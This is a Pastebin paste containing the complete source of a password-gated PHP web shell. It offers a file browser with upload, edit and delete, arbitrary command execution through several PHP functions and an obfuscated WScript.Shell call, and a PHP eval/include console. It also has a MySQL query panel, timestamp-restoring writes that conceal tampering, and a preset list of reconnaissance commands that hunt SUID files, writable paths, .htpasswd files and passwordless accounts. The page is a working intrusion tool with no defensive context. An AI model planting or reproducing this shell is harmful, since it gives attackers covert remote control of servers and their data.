Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- #------------------Security------------------#
- $name_c = "checkIndentity";
- function get_c($name_c){
- foreach($_COOKIE as $key=>$value) {
- if ($key == $name_c)
- return $c = $value;
- else
- return false;
- }
- }
- function is_cookie ($search_cookie) {
- foreach($_COOKIE as $key=>$value) {
- if ($value == $search_cookie)
- return true;
- else
- return false;
- }
- }
- if (md5($_REQUEST['p']) == "1b0ca22694b8eb1303af4d535bc15df7" || is_cookie(get_c($name_c))){
- if(!is_cookie(get_c($name_c))) setcookie("checkIndentity",md5($_REQUEST['p']));
- #------------------END Security------------------#
- ##################################################
- #------------------Private Class------------------#
- class browseDir {
- var $pwd;
- var $newLocation;
- var $lastOpenFile;
- function browseDir(){
- $d=$this->pwd = getcwd();
- $this->changeDir($d);
- }
- function upload($ifupload){
- if(isset($ifupload)){
- $uploadfile = $_SESSION['lastchg'].'/'.basename($_FILES['uploadfile']['name']);
- if (! move_uploaded_file($_FILES['uploadfile']['tmp_name'], $uploadfile)){
- print "Unable to move ".
- $_FILES['uploadfile']['tmp_name']." file to<br />$uploadfile<br />";
- }
- if (file_exists($uploadfile)) @chmod($uploadfile, 0777);
- }
- }
- function changeDir ($dir){
- $dir=trim($dir);
- @chdir($this->pwd);
- if (!file_exists($dir)){print "$dir: No such file or directory<br />\n";return;}
- if (!@chdir($dir)) {print "$dir: Failed<br />\n";return;}
- return $this->pwd = getcwd();
- }
- function getDirList($newLocation='',$viewperms=''){
- $handle = '';
- if(!empty($viewperms) && $viewperms == 'viewFullperms') $_SESSION['vfp'] = 'full'; //view perms
- $self = $_SERVER['PHP_SELF'];
- if (empty($this->newLocation) && $this->newLocation == ''){
- $this->newLocation=$_SESSION['lastchg'];
- $handle = @opendir($this->pwd);
- if(!$handle) {print "No perms to read: ".$this->pwd.'<br />';}
- $dirs = array();
- $files = array();
- while (false !== ($file = @readdir($handle))) {
- if ($file != ".") {
- if (is_dir($file)) $dirs[] = $file;
- else $files[] = $file;
- }
- }
- }
- if (!empty($this->newLocation) && $this->newLocation != ''){
- if(isset($_SESSION['lastchg'])) {
- $this->pwd = &$_SESSION['lastchg'];
- $_SESSION['lastchg'] = $this->changeDir($this->newLocation);
- }
- if(empty($_SESSION['lastchg'])) $_SESSION['lastchg'] = $this->changeDir($this->newLocation);
- }
- $handle = @opendir($this->pwd);
- if(!$handle) {print "No perms to read: ".$this->pwd.'<br />';}
- $dirs = array();
- $files = array();
- while (false !== ($file = @readdir($handle))) {
- if ($file != ".") {
- if (is_dir($file)){
- $dirs[] = $file;
- } else {
- $files[] = $file;
- }
- }
- }
- @closedir($handle);
- natcasesort($files);
- natcasesort($dirs);
- print '<tr><td valign="top">';
- print '<i>'.getcwd().'</i><br/>';
- print '<hr><br/>';
- foreach ($dirs as $d){
- print '<a href="?command='.urlencode($d).'">'.htmlentities($d)."</a> ".$this->_view_perms($d,$_SESSION['vfp'])."<br />";
- }
- print '<hr/>';
- foreach ($files as $f){
- if (is_readable($f))
- print '<a target="_blank" href="'.$_SERVER['PHP_SELF'].'/'.urlencode($f).'?getfile='. urlencode($f).'">'.htmlentities($f).'</a>'." ".$this->_view_perms($d,$_SESSION['vfp']);
- else print htmlentities($f);
- print "<br />\n";
- }
- print "<br />\n";
- print "<br />\n";
- if (is_writeable(getcwd())){
- print '<form enctype="multipart/form-data" action="'.$self.'" method="post">';
- print '<tr><td><input type="file" name="uploadfile" />';
- print '<input type="submit" name="uploading" value="Upload" /> <input type="submit" name="perms" value="viewFullperms" /></td></tr>';
- print '</form>';
- }
- print "</td><td>";
- }
- function showFile ($fname,$escapeOutput = true){
- if(empty($this->pwd) && $this->pwd=='') $this->pwd = '.';
- $fullpath = $_SESSION['lastchg']."/$fname"; $ctype = 'text/plain';
- if (! is_readable($fullpath)){print "Unable to read $fullpath";return;}
- if ($ctype == 'text/html' && $escapeOutput) header("Content-type: text/plain\r\n\r\n");
- else header( "Content-type: $ctype\r\n\r\n");
- if($fh=@fopen($fullpath,'r')){
- $code=@fread($fh,filesize($fullpath));
- @fclose($fh);
- echo $code;
- }else readfile($fullpath);
- }
- function send_file($dist_name='') {
- ob_end_clean();
- /*$e = split("/", strrev($dist_name), 2);
- $name = strrev($e[0]);
- $distination = strrev($e[1]);
- $path = $distination."/".$name;*/
- if(empty($this->pwd) && $this->pwd == '') $this->pwd = '.';
- $path = $this->pwd."/$dist_name";
- if (!is_file($path) or connection_status()!=0) return(FALSE);
- header("Cache-Control: no-store, no-cache, must-revalidate");
- header("Cache-Control: post-check=0, pre-check=0", false);
- header("Pragma: no-cache");
- header("Expires: ".gmdate("D, d M Y H:i:s", mktime(date("H")+2, date("i"), date("s"), date("m"), date("d"), date("Y")))." GMT");
- header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
- header("Content-Type: application/octet-stream");
- header("Content-Length: ".(string)(filesize($path)));
- header("Content-Disposition: inline; filename=".str_replace(" ","",$name));
- header("Content-Transfer-Encoding: binary\n");
- if ($file = fopen($path, 'rb')) {
- while(!feof($file) and (connection_status()==0)) {
- print(fread($file, 1024*8));
- flush();
- }
- fclose($file);
- }
- return((connection_status()==0) and !connection_aborted());
- }
- function shh_curPageURL() {
- global $SLASHSTR;
- $pageURL = 'http';
- //if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
- $pageURL .= "://";
- if ($_SERVER["SERVER_PORT"] != "80") {
- $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
- } else {
- $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
- }
- if(!strstr($pageURL, $SLASHSTR)){
- if(strpos($pageURL, '?')){$pageURL.="&$SLASHSTR";}else{$pageURL.="?$SLASHSTR";}
- }
- return $pageURL;
- }
- function print_a( $TheArray ){
- echo "<table border=1>\n";
- $Keys = array_keys( $TheArray );
- foreach( $Keys as $OneKey ){
- echo "<tr>\n";
- echo "<td bgcolor='#727450'>";
- echo "<B>" . $OneKey . "</B>";
- echo "</td>\n";
- echo "<td bgcolor='#C4C2A6'>";
- if ( is_array($TheArray[$OneKey]) )
- $this->print_a($TheArray[$OneKey]);
- else
- echo $TheArray[$OneKey];
- echo "</td>\n";
- echo "</tr>\n";
- }
- echo "</table>\n";
- }
- function read_write_file($f,$rw='read',$contents='') {
- global $CURFILE;
- $file_mtime = @filemtime($f);
- $file_atime = @fileatime($f);
- $dir_mtime = @filemtime(@dirname($f));
- $dir_atime = @fileatime(@dirname($f));
- if($rw=='read'){
- if ($file_h = @fopen($f, "rb")) {
- $contents = @fread($file_h, filesize($f)); @fclose($file_h);
- if ($file_mtime) @touch($f, $file_mtime, $file_atime);
- if ($dir_mtime) @touch(@dirname($f), $dir_mtime, $dir_atime);
- return $contents;
- } else {
- return false;
- }
- }elseif($rw=='write'){
- if ($file_h = @fopen($f, "wb")) {
- @fwrite($file_h, $contents); @fclose($file_h);
- if ($file_mtime) @touch($f, $file_mtime, $file_atime);
- if ($dir_mtime) @touch(@dirname($f), $dir_mtime, $dir_atime);
- return true;
- } else {
- return false;
- }
- }else return false;
- }
- function FileEdit($ifSubmit,$filename,$contents){
- $filename = $_SESSION['lastchg']."/".$filename;
- if($ifSubmit == "Open"){
- if(file_exists($filename)){
- $_SESSION['lastOpenFile'] = $filename;
- return $filecontents = $this->read_write_file($filename);
- if(!$filecontents){//SafeMode Hack PHP 4.4.2 and 5.1.2
- $tymczas=$_SESSION['lastchg']."/";
- $temp=tempnam($tymczas, "cx");
- if(copy("compress.zlib://".$filename, $temp)){
- return $filecontents = $this->read_write_file($temp);
- }else echo $status = "Some error.. Try again";
- }
- }else $status = "File dosen't exist!";
- }else if($ifSubmit == "Delete"){
- if(file_exists($filename)){
- if(unlink($filename))
- $status = "Deleted sucessfully!";
- else
- $status = "Can't delete!";
- }
- else $status = "File doesn't exist";
- }else if($ifSubmit == "Save"){
- $filecontents = stripslashes(html_entity_decode($contents));
- //if($_SESSION['lastOpenFile'] != '') $this->read_write_file($_SESSION['lastOpenFile'], "write", $filecontents);
- $this->read_write_file($filename, "write", $filecontents);
- }else if($ifSubmit == "Reset"){
- $filename='';
- $filecontents='';
- $_SESSION['lastOpenFile'] = '';
- $_SESSION['vfp'] = 'short';
- $_SESSION['lastchg'] = '.';
- }
- }
- function select_populator($selectName,$value_array, $current_value, $onchange=''){
- $html = "";
- $html = "<select id=\"$selectName\" name=\"$selectName\" onchange=\"$onchange\">";
- foreach($value_array as $key=>$value){
- $html .= "<option value=\"".$value."\"";
- if($current_value == $key)
- $html .= " selected";
- $html .= ">".$key."</option>\n";
- }
- $html .= "</select>";
- echo ($html);
- }
- function serverInfo(){
- $phpscript = $_SERVER['SCRIPT_NAME'];
- if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on"){
- $safemode = TRUE;
- echo "SafeMode: ".$hsafemode = "<font color=red>ON (secure)</font><br/>";
- }else {
- $safemode = FALSE;
- echo "SafeMode: ".$hsafemode = "<font color=green>OFF (not secure)</font><br/>";
- }
- $v = @ini_get("open_basedir");
- if ($v or strtolower($v) == "on") {
- $openbasedir = TRUE;
- echo "OpenInBaseDir: ". $hopenbasedir = "<font color=red>".$v."</font><br/>";
- }else {
- $openbasedir = FALSE;
- echo "OpenInBaseDir: ". $hopenbasedir = "<font color=green>OFF (not secure)</font><br/>";
- }
- $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); preg_match("@.*\)@",$DISP_SERVER_SOFTWARE,$m); $servinf = $m[0];
- echo "ApacheServerInfo: <font color=green>".$servinf."</font><br/>";
- echo "Disable functions : ";
- if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font><br/>";}else{echo "<font color=red>$df</font><br/>";}
- echo "PHP Info: <a href=$phpscript?act=phpinfo target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a><br />";
- }
- function view_perms($mode)
- {
- if (($mode & 0xC000) === 0xC000) {$type = "s";}
- elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
- elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
- elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
- elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
- elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
- elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
- else {$type = "?";}
- $owner["read"] = ($mode & 00400)?"r":"-";
- $owner["write"] = ($mode & 00200)?"w":"-";
- $owner["execute"] = ($mode & 00100)?"x":"-";
- $group["read"] = ($mode & 00040)?"r":"-";
- $group["write"] = ($mode & 00020)?"w":"-";
- $group["execute"] = ($mode & 00010)?"x":"-";
- $world["read"] = ($mode & 00004)?"r":"-";
- $world["write"] = ($mode & 00002)? "w":"-";
- $world["execute"] = ($mode & 00001)?"x":"-";
- if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
- if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
- if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
- return $type.join("",$owner).join("",$group).join("",$world);
- }
- function view_perms_color($o)
- {
- if (!is_readable($o)) {return "<font color=red>".$this->view_perms(fileperms($o))."</font>";}
- elseif (!is_writable($o)) {return "<font color=white>".$this->view_perms(fileperms($o))."</font>";}
- else {return "<font color=green>".$this->view_perms(fileperms($o))."</font>";}
- }
- function _view_perms($d,$vfp){
- $wdt='';
- if (is_writable($d)){
- $wd = TRUE;
- if($vfp=='full') return $wdt = "<b><font color=green>".$this->view_perms(fileperms($d))."</font></b>";
- else return $wdt = "<font color=green>[ ok ]</font>";
- }else{
- $wd = FALSE;
- if($vfp=='full') return $wdt = "<b>".$this->view_perms_color($d)."</b>";
- else return $wdt = "<font color=red>[ Read-Only ]</font>";
- }
- }
- }
- #------------------END Private Class------------------#
- #######################################################
- #------------------Define Variables------------------#
- $SLASHSTR='sht=%22';
- $act = $_GET['act'];
- $viewperms='';if(isset($_REQUEST["perms"])){$viewperms=trim($_REQUEST["perms"]);}
- $_execfuncs='';if(isset($_REQUEST["exec_funcs"])){$_execfuncs=trim($_REQUEST["exec_funcs"]);}
- $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','Wscript.Shell'=>'wscript') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
- $nixcommands=array("LynxVersion"=>"cat /proc/version","loggedInUsers"=>"w","IsCurl Installed"=>"which curl","Is writable etc"=>"find /etc/ -type f -perm -o+w 2> /dev/null","cpu info"=>"cat /proc/version /proc/cpuinfo","kernel ver."=>"uname -a","user w/o pass"=>"cut -d: -f1,2,3 /etc/passwd | grep ::","find all suid files"=>"find / -type f -perm -04000 -ls", "find suid files in current dir"=>"find . -type f -perm -04000 -ls", "find all sgid files"=>"find / -type f -perm -02000 -ls", "find all writable folders and files"=>"find / -perm -2 -ls","find all writable folders and files in current dir"=>"find . -perm -2 -ls" ,"find config.inc.php files"=>"find / -type f -name config.inc.php", "find all .htpasswd files"=>"find / -type f -name .htpasswd","show opened ports"=>"netstat -an | grep -i listen");
- $contents='';if(isset($_REQUEST["contents"])){$contents=trim($_REQUEST["contents"]);}
- $submit='';if(isset($_REQUEST["submit"])){$submit=trim($_REQUEST["submit"]);}
- $filename='';if(isset($_REQUEST["filename"]) && $_REQUEST["filename"] != ''){$filename = trim($_REQUEST["filename"]);}
- $isupload='';if($_REQUEST['uploading'] != '' && $_REQUEST['uploading'] == 'Upload'){$isupload=$_REQUEST['uploading'];}
- $openFile = '';if(isset($_REQUEST['getfile'])){$openFile=trim($_REQUEST['getfile']);}
- $shhptr='';if(isset($_REQUEST['shhptr'])){$shhptr=trim($_REQUEST['shhptr']);} // print_r($_REQUEST);
- $_SESSION['button'] = $shhptr;$page = $_SESSION['button'];
- $newLocation='';if(isset($_REQUEST['command'])){$newLocation=trim($_REQUEST['command']);}
- $cmd='';if(isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);}
- $shhcmd='';if(isset($_REQUEST['shhcmd'])){$shhcmd=trim($_REQUEST['shhcmd']);}
- $shhqry='';if(isset($_REQUEST['shhqry'])){$shhqry=trim($_REQUEST['shhqry']);}
- $sdbhst='';if(isset($_REQUEST['sdbhst'])){$sdbhst=trim($_REQUEST['sdbhst']);}
- $sdbusr='';if(isset($_REQUEST['sdbusr'])){$sdbusr=trim($_REQUEST['sdbusr']);}
- $sdbpsw='';if(isset($_REQUEST['sdbpsw'])){$sdbpsw=trim($_REQUEST['sdbpsw']);}
- $sdbsch='';if(isset($_REQUEST['sdbsch'])){$sdbsch=trim($_REQUEST['sdbsch']);}
- $shhcod='';if(isset($_REQUEST['shhcod'])){$shhcod=trim($_REQUEST['shhcod']);}
- $shhx='no';if(isset($_REQUEST['shhx'])){$shhx=trim($_REQUEST['shhx']);}
- $shhfnm='';if(isset($_REQUEST['shhfnm'])){$shhfnm=trim($_REQUEST['shhfnm']);}
- $slashtest=false;if(isset($_REQUEST['sht'])){$slashtest=trim($_REQUEST['sht']);}
- if(($slashtest!=false)&&($slashtest!='')){if($slashtest==='\"'){
- $shhcod = stripslashes($shhcod);
- $shhcmd = stripslashes($shhcmd);
- $shhqry = stripslashes($shhqry);
- }}
- #------------------END Define Variables------------------#
- ##########################################################
- print_r($_SESSION['lastchg']);
- if(empty($_SESSION['lastchg']) || $_SESSION['lastchg'] == ''){
- $browser = new browseDir();
- session_start();
- }
- if($openFile!='') {$browser->showFile($openFile);exit;}
- ?>
- <html>
- <head>
- <SCRIPT language="JavaScript">
- function submitform(num){
- var num;
- document.theshll.shhptr.value = num;
- document.theshll.submit();
- }
- function selcurr()
- {
- var mylist=document.getElementById("nixcmd");
- document.getElementById("nixcomm").value=mylist.options[mylist.selectedIndex].value;
- }
- </SCRIPT>
- <style type="text/css">
- input{color:#2EFE2E;background-color:black;margin:3px;}
- textarea{border-color:white;color:#2EFE2E;background-color:black;margin:3px;}
- body{color:white;background-color:black;}
- a{color:white;}
- td{border-color:white;color:#2EFE2E;background-color:black;margin:1px;}
- th{color:green;}
- </style>
- </head>
- <body>
- <? if($shhptr == 0 || $shhptr == ''){$browser->newLocation = $newLocation; $f_edit = $browser->FileEdit($submit,$filename,$contents);?>
- <form name="theshll" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
- <input type="hidden" name="shhptr" value="<?php echo $shhptr ?>" />
- <input type="button" name="1" value="SQL" onmousedown="submitform(1);" />
- <input type="button" name="2" value="EVAL" onmousedown="submitform(2);" /><br/>
- <table border="1" width="26%" align="left" >
- <tr><td><?$browser->serverInfo();?></td></tr>
- <tr><th>CurrentDirectoryListing</th>
- </form>
- <?if($isupload != '' && !empty($isupload))$browser->upload($isupload);
- $browser->getDirList($_SESSION['lastchg'],$viewperms);?></table>
- <table border="1">
- <form action="<?php echo $_SERVER['PHP_SELF'];?>" method="post">
- <?php
- echo '<tr><td><textarea rows="24" name="contents" wrap="hard" cols="100">';
- if(($shhptr=='')&&($cmd!='')){
- if ($_execfuncs=="system") {
- system($cmd);
- } elseif ($_execfuncs=="passthru") {
- if(passthru($cmd, $out)){
- echo htmlentities(implode("\n",$out));
- }
- } elseif ($_execfuncs=="exec") {
- $result = exec($cmd);
- echo $result;
- } elseif ($_execfuncs=="shell_exec") {
- $result=shell_exec($cmd);
- echo $result;
- } elseif ($_execfuncs=="popen") {
- $pp = popen($cmd, 'r');
- $read = fread($pp, 2096);
- echo $read;
- pclose($pp);
- } elseif ($_execfuncs=="wscript") {
- $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
- $exec = $wsh->exec ("cm"."d.e"."xe /c ".$cmd."");
- $stdout = $exec->StdOut();
- $stroutput = $stdout->ReadAll();
- echo $stroutput;
- } else {
- system($cmd);
- }
- }
- if($submit == 'Open') echo $f_edit;
- echo '</textarea></td></tr>';
- ?>
- <tr><td><input name="filename" type="text" value="<?echo $filename;?>" size="20">
- <input type="submit" name="submit" value="Open">
- <input type="submit" name="submit" value="Save">
- <input type="submit" name="submit" value="Delete">
- <input type="submit" name="submit" value="Reset">
- <?$browser->select_populator('exec_funcs',$execfuncs,'passthru');?><input align="left" type="text" name="cmd" id="nixcomm" size="30"/><input type="submit" value="EXECUTE"/></td></tr>
- <tr><td><b>'NIX CommandQuickLunch</b> <?$browser->select_populator('nixcmd',$nixcommands,'','selcurr()');?></td></tr>
- </form>
- </table>
- <?if($act == 'phpinfo'){
- ob_start();
- eval(phpinfo());
- $_eval=ob_get_contents();
- ob_end_clean();
- echo $_eval;
- }}?>
- <?if(($page=='1')){?>
- <form name="theshll" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
- <input type="hidden" name="shhptr" value="<?php echo $shhptr ?>" />
- <input type="button" name="1" value="BROWSE" onmousedown="submitform(0);" />
- <input type="button" name="2" value="EVAL" onmousedown="submitform(2);" />
- <div style="width: 600px;">
- <div style="float:left;">
- <input type="text" name="sdbhst" size="20" value="<?php echo $sdbhst; ?>" />.::Host:. <br />
- <input type="text" name="sdbsch" size="20" value="<?php echo $sdbsch; ?>" />.::DB:.</div>
- <div style="margin-left:20px;float:left;">
- <input type="text" name="sdbusr" size="20" value="<?php echo $sdbusr; ?>" />.::User:.<br />
- <input type="text" name="sdbpsw" size="20" value="<?php echo $sdbpsw; ?>" />.::Pass:.</div>
- <input type="text" name="shhqry" size="80" value="<?php echo $shhqry; ?>" />
- <input type="submit" value="QUERY" /></form>
- <?php
- echo "<table>";
- if(($shhptr=='1')&&($shhqry!='')){
- if ($mysql = @mysql_connect($sdbhst, $sdbusr, $sdbpsw)){
- if(@mysql_select_db($sdbsch)) {
- if($res = @mysql_query($shhqry)){
- if($row = mysql_fetch_assoc($res)){
- while($row = mysql_fetch_assoc($res)){
- $arr[] = $row;
- }
- $browser->print_a($arr);
- }
- } else echo "mysql query error: ".mysql_error()."\n";
- } else echo "mysql select error: ".mysql_error()."\n";
- @mysql_close($mysql);
- } else echo "mysql connect error: ".mysql_error()."\n";
- }
- echo "</table>";
- }
- if(($page=='2')){
- ?>
- <form name="theshll" action="<?php echo $browser->shh_curPageURL(); ?>" method="POST">
- <input type="hidden" name="shhptr" value="<?php echo $shhptr ?>" />
- <input type="button" name="1" value="BROWSE" onmousedown="submitform(0);" />
- <input type="button" name="2" value="SQL" onmousedown="submitform(1);" /><br/>
- <input type="text" name="shhfnm" size="40" value="<?php echo $shhfnm; ?>" />
- <input type="submit" name="shhx" value="SAVE AS" />
- <input type="submit" name="shhx" value="INCLUDE/RUN" /><br />
- <input type="submit" name="shhx" value="EVALUATE" /><br />
- <textarea name="shhcod" wrap="off" rows="15" cols="65" >
- <?php echo $shhcod;?>
- </textarea>
- </form>
- <?php
- echo "<div id=\"reslt\">";
- switch($shhx){
- case 'EVALUATE':
- if($shhcod!=''){
- ob_start();
- eval($shhcod);
- $eval=ob_get_contents();
- ob_end_clean();
- } else {
- ob_start();
- echo "Enter PHP code!";
- $eval=ob_get_contents();
- ob_end_clean();
- }
- break;
- case 'SAVE AS':
- if($shhfnm!=''){
- $f = @fopen($shhfnm, 'w');
- if($f){
- if(strpos($shhcod, '<?php')===false){
- $shhcodz = "<?php\n".$shhcod."\n".'?'.'>';
- } else $shhcodz = $shhcod;
- fwrite($f, $shhcodz);
- fclose($f);
- echo "Saved.";
- } else echo "Cannot write file!\n";
- } else echo "Enter file name!\n";
- break;
- case 'INCLUDE/RUN':
- if($shhfnm!=''){
- if (!@include($shhfnm)){
- echo "Include error!";
- };
- } else echo "Enter file name!\n";
- break;
- }
- if(!empty($eval) && $eval != ''){
- echo '<table align="left" border="0" >';
- echo '<th align="center">EVAL OUTPUT:</th>';
- echo '</table><br/>';
- echo '<br/>';
- echo '<table align="left" border="1" width="48%" height="30%">';
- echo '<tr><td align="center">'.$eval.'</td></tr>';
- echo '</table>';
- }
- }
- ?>
- <th ></td>
- </body></html>
- <?}?>
Advertisement
Add Comment
Please, Sign In to add comment